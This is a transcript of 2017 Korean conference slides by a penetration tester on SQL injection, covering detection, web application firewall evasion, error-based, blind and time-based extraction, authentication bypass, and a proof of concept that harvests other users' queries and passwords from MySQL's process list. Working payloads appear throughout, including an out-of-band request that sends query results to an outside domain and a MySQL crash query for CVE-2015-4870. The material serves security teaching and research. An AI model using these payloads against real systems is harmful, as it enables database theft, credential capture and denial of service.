웹해킹이라고 무시하 는 것들 보소 -...
Transcript of 웹해킹이라고 무시하 는 것들 보소 -...
웹해킹이라고 무시하 는 것들 보소
2017.07.10
RUBIYA805[AT]GMAIL[DOT]COM
SQL Injection 끝나지 않은 위협
2017.07.10
RUBIYA805[AT]GMAIL[DOT]COM
Who am I
• 정도원 aka rubiya
• Penetration tester
• Web application bughuter
• Pwned 20+ wargame
• @kr_rubiya
• 백수 · Jobless
• How to find vulnerability?
• How to exploit vulnerability?
• Exploit more smartly
• MITM SQL Injection
What is SQL Injection
SELECT * FROM users WHERE name = '" + userName + "';
What is SQL Injection
SELECT * FROM users WHERE name = ‘FooBar’;
What is SQL Injection
SELECT * FROM users WHERE name = ‘1’ OR ‘1’=‘1’;
What is SQL Injection
SELECT * FROM users WHERE name = ‘1’ OR ‘1’=‘1’;
Easy to access
NT Web Technology Vulnerabilities
But…
Why hard to prevent
Why hard to prevent
Why hard to prevent
Why hard to prevent
Why hard to prevent
Why hard to prevent
How to find sqli vuln?
How to find sqli vuln?
How to find sqli vuln?
How to find sqli vuln?
How about AEG?
How about AEG?
How about AEG?
How about AEG?
How to find sqli vuln?
How to find sqli vuln?
How to find sqli vuln?
How to find sqli vuln?
Indirect SQL Injection
Indirect SQL Injection
Indirect SQL Injection
Indirect SQL Injection
Web Application Firewall
• 웹 어플리케이션을 보호할 목적으로 개발된 공격 차단 솔루션
Web Application Firewall
• 웹 어플리케이션을 보호할 목적으로 개발된 공격 차단 솔루션
Web Application Firewall
• 패턴 기반 방화벽
Web Application Firewall
• 패턴 기반 방화벽
• Pattern = ‘ or ‘1’=‘1
‘ and ‘1’=‘1
‘ || ‘1’=‘1
Web Application Firewall
• 패턴 기반 방화벽
• Pattern = ‘ or ‘1’=‘1 ‘ or ‘2’=‘2
‘ and ‘1’=‘1
‘ || ‘1’=‘1
Web Application Firewall
• 패턴 기반 방화벽
• Pattern = ‘ or ‘1’=‘1
‘ and ‘1’=‘1
‘ || ‘1’=‘1
‘ or ‘2’=‘2
Web Application Firewall
• 패턴 기반 방화벽
• Pattern = ‘ or ‘1’=‘1 ‘ or ‘3’=‘3
‘ and ‘1’=‘1
‘ || ‘1’=‘1
‘ or ‘2’=‘2
Web Application Firewall
• ASP에서는 %[00-FF] 범위를 초과하면 %를 무시
Web Application Firewall
• ASP에서는 %[00-FF] 범위를 초과하면 %를 무시
?id=‘UN%ION SE%LECT 1--;
Web Application Firewall
• ASP에서는 %[00-FF] 범위를 초과하면 %를 무시
?id=‘UN%ION SE%LECT 1--;
↓
?id=‘UNION SELECT 1--;
SQL Injection + DDOS?
SQL Injection + DDOS?
How to exploit vulnerability?
• Classic SQL Injection
• Blind SQL Injection
• Error Based SQL Injection
• Error Based Blind SQL Injection
• Time Based Blind SQL Injection
Error Based SQL Injection
• 에러 메세지를 클라이언트에 출력해줄 때 가능
• 원하는 값을 에러 메세지에 포함시키는 기법
• DBMS마다 공격 방법이 다름
Error Based SQL Injection - MSSQL
Error Based SQL Injection - MySQL
• Duplicate entry
• XPATH syntax error
• BIGINT value is out of range in
Error Based SQL Injection - MySQL
• Duplicate entry
‘||1 group by mid(version(),rand())having min(1)#
• XPATH syntax error
‘|updatexml(0,concat(0xa,version()),0)#
• BIGINT value is out of range in
‘--~(select*from(select@@version)f)#
Error Based Blind SQL Injection
• Query 결과값의 True/False 여부를 알 수 없을 때 사용
• 에러 발생시에 예외처리가 될 때 가능
Error Based Blind SQL Injection
ascii(substr((select pw from users),1,1))=97
Error Based Blind SQL Injection
select(select 96 union select
ascii(substr((select pw from users),1,1)))
select(select 97 union select
ascii(substr((select pw from users),1,1)))
Error Based Blind SQL Injection
select(select 96 union select
ascii(substr((select pw from users),1,1)))
96,97 return -> error
select(select 97 union select
ascii(substr((select pw from users),1,1)))
97 return -> no error
Time Based Blind SQL Injection
Time Based Blind SQL Injection
• MySQL
sleep(), benchmark()
• MSSQL
waitfor delay, waitfor time
• Oracle
dbms_lock.sleep()
Compounded SQL Injection
• SQLi + XSS
• SQLi + Authentication Bypass
• Out Of Band SQLi
SQLi + XSS
• Insert, Update 가 가능할 경우 Stored XSS 연계
• Iframe 태그를 통한 브라우저 1-Day 공격 유행
SQLi + XSS
• Insert, Update 가 가능할 경우 Stored XSS 연계
• Iframe 태그를 통한 브라우저 1-Day 공격 유행
INSERT INTO board(no,user,<script>evilcode</script>)
UPDATE board SET content=<script>evilcode</script>
SQLi + Authentication Bypass
• Union SQL Injection
• 재귀적 return값을 통한 인증 우회
Union SQL Injection
• Object Injecton
• SSRF
• XML External Entity
• LFI / RFI
재귀적 return값을 통한 인증 우회
재귀적 return값을 통한 인증 우회
s = 's = %r\nprint(s%%s)'
print(s%s)
재귀적 return값을 통한 인증 우회
SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine
재귀적 return값을 통한 인증 우회
if(queryResult)
if(queryResult == input)
loginSuccess()
재귀적 return값을 통한 인증 우회
?id=asd' union select 1,'admin',REPLACE(@v:='asd\' union select 1,\'admin\',REPLACE(@v:=\'2\',1+1,REPLACE(REPLACE(@v,\'\\\\\',\'\\\\\\\\\'),\'\\\'\',\'\\\\\\\'\'))--',1+1,REPLACE(REPLACE(@v,'\\','\\\\'),'\'','\\\''))--
재귀적 return값을 통한 인증 우회
Out Of Band SQLi
• 외부 서버로의 Packet 전송
• 내부 네트워크 파일 접근
• SQL 서버에 대한 DoS
Out Of Band SQLi
• DNS Query
UTL_HTTP.REQUEST('http://'||(select…)||'.mydomain');
• Access SMB file
load_file('\\\\192.168.0.101\\aa');
DBMS에 대한 DoS
• BENCHMARK()
• Heavy Query
• CVE-2015-4870
CVE-2015-4870
select * from information_schema.tables
procedure analyse((select*from(select 1)x),1);
Lord of SQL Injection
Lord of SQL Injection
Exploit more smartly
• Bitwise operation Blind SQL Injection
• UPDATE, INSERT Blind SQL Injection without modify data
• MITM SQL Injection
Blind SQL Injection의 단점
• 느리다.
• 로그가 많이 남는다.
Bitwise operation Blind SQL Injection
ascii(substr((select pw from users),1,1))=97
Bitwise operation Blind SQL Injection
substr(
lpad(
bin(
ascii(substr((select pw from users),1,1))
)
,8,0)
,1,1) = 1
Bitwise operation Blind SQL Injection
substr(
lpad(
bin(
97
)
,8,0)
,1,1) = 1
Bitwise operation Blind SQL Injection
substr(
lpad(
1100111
,8,0)
,1,1) = 1
Bitwise operation Blind SQL Injection
substr(01100111,1,1) = 1
Bitwise operation Blind SQL Injection
substr(lpad(bin(
ascii(substr((select pw from users),1,1))
),7,0),1,1)
MITM SQL Injection
• Information_schema.processlist.info
Sniff Query?
• 회원가입
insert into users values(“guest123”,md5(“mypass666”))
• 로그인
select...where id=‘guest123’ and pw=md5(‘mypass666’)
But…
• 직접 Sniffing하는게 너무 느리다면 DBMS에게 시키자!
• BENCHMARK(count,expr)
• @var_name = expr
SELECT benchmark(9999999,
@query:=concat(
@query,(select info from information_schema.processlist)
)
)
Issues
• 반복된 값을 조회할 때 Query의 결과값이 cache됨
select 권한만 가지고는 cache를 끌 수 없음
• 한번 조회된 query가 무수히 조회됨
Proof of Concept
SELECT @query:=0x3a3a UNION SELECT @tmp:=0x20 UNION SELECT benchmark(500000,(@tmp:= (SELECT Group_concat(info) FROM information_schema.processlist WHERE info NOT LIKE 0x254d49544d5f53514c495f50574e25 or sleep(0)/*MITM_SQLI_PWN*/))^(IF((@tmp!=0x00)&&(@query NOT LIKE concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)), @query:=concat(@query,replace(@tmp,0x0a,0x5c6e),0x3a3a),0))) UNION SELECT @query limit 3,1
Proof of Concept
Tank You [email protected]